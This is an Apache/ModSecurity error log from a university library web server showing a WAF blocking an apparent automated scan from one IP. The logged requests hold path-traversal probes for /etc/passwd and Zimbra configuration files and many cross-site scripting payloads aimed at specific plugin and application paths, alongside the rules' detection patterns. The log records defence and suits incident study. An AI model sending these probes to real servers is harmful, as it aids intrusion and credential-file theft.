[Tue Aug 29 11:52:15.541367 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAnkwgYAAAAY"]
[Tue Aug 29 11:52:16.638162 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/download"] [unique_id "ZO15gMCo-f0AAAnd3FcAAAAI"]
[Tue Aug 29 11:52:16.717493 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAlUlrMAAAA0"]
[Tue Aug 29 11:52:17.545364 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAjdQbsAAAAZ"]
[Tue Aug 29 11:52:17.837065 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAjdQb4AAAAZ"]
[Tue Aug 29 11:52:17.882884 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gcCo-f0AAAni-A0AAAAU"]
[Tue Aug 29 11:52:17.883513 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAnHQioAAAAT"]
[Tue Aug 29 11:52:18.646577 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15gsCo-f0AAAlIBlwAAAAn"]
[Tue Aug 29 11:52:19.743101 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAn96AgAAAAD"]
[Tue Aug 29 11:52:21.166871 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hcCo-f0AAAoEZM0AAAAB"]
[Tue Aug 29 11:52:21.881218 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hcCo-f0AAAoLfEMAAAAG"]
[Tue Aug 29 11:52:23.546985 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAoO5yIAAAAK"]
[Tue Aug 29 11:52:24.827896 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAnoOq0AAAAf"]
[Tue Aug 29 11:52:25.579347 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAn0GdsAAAAa"]
[Tue Aug 29 11:52:26.574920 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAnTlPMAAAAA"]
[Tue Aug 29 11:52:26.628711 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAoEZOkAAAAB"]
[Tue Aug 29 11:52:26.648378 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15isCo-f0AAAoQ3IIAAAAN"]
[Tue Aug 29 11:52:26.658910 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAoPuToAAAAM"]
[Tue Aug 29 11:52:27.608600 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO15i8Co-f0AAAn401IAAAAW"]
[Tue Aug 29 11:52:27.656079 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAnn2DUAAAAe"]
[Tue Aug 29 11:52:28.556653 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15jMCo-f0AAAoO5zQAAAAK"]
[Tue Aug 29 11:52:28.681073 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAoLfFkAAAAG"]
[Tue Aug 29 11:52:29.544778 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAnd3GwAAAAI"]
[Tue Aug 29 11:52:30.570100 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAoGFX0AAAAE"]
[Tue Aug 29 11:52:33.564036 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kcCo-f0AAAoPuVAAAAAM"]
[Tue Aug 29 11:52:33.708700 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAoPuVIAAAAM"]
[Tue Aug 29 11:52:33.735899 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAlUltAAAAA0"]
[Tue Aug 29 11:52:34.659240 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAnHQkIAAAAT"]
[Tue Aug 29 11:52:34.671914 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAoLfHEAAAAG"]
